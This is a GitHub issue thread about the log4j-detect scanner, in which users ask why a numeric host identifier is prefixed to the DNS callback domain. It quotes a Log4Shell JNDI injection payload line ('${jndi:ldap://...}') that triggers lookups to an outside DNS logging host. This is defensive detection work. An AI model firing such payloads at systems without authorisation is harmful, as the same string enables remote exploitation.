### ISSUE TITLE
why using  str(urlId) ?

### ISSUE THREAD

**Issue by Deathpoolxrs** [takito1812/log4j-detect#2]
I dont why ur using  str(urlId)  because this will set the payload to something like ${jndi:idap://1.<dnslog.cn>/a}
This will not work if you add 1 . If i am wrong please correct me 

        payload = '${jndi:ldap://' + str(urlId) + '.' + argv[2] + '/a}'

Thank you

**Comment by rfog** [comment]
I tested removing the str(urlId) part and in both cases the canary trap works in affected systems and does not notifies in non-affected.

**Comment by Deathpoolxrs** [comment]
Please try to use subdomain of dnslog.cn and let me know 

Thank you

**Comment by takito1812** [comment]
Hello @Deathpoolxrs, as I indicate in the README of the repository, it is an identifying number to know which host of specified listing has responded via DNS.
A picture is worth a thousand words.
![imagen](https://user-images.githubusercontent.com/56491288/145854537-5c70b598-059e-472c-888e-1cc40dcceefe.png)
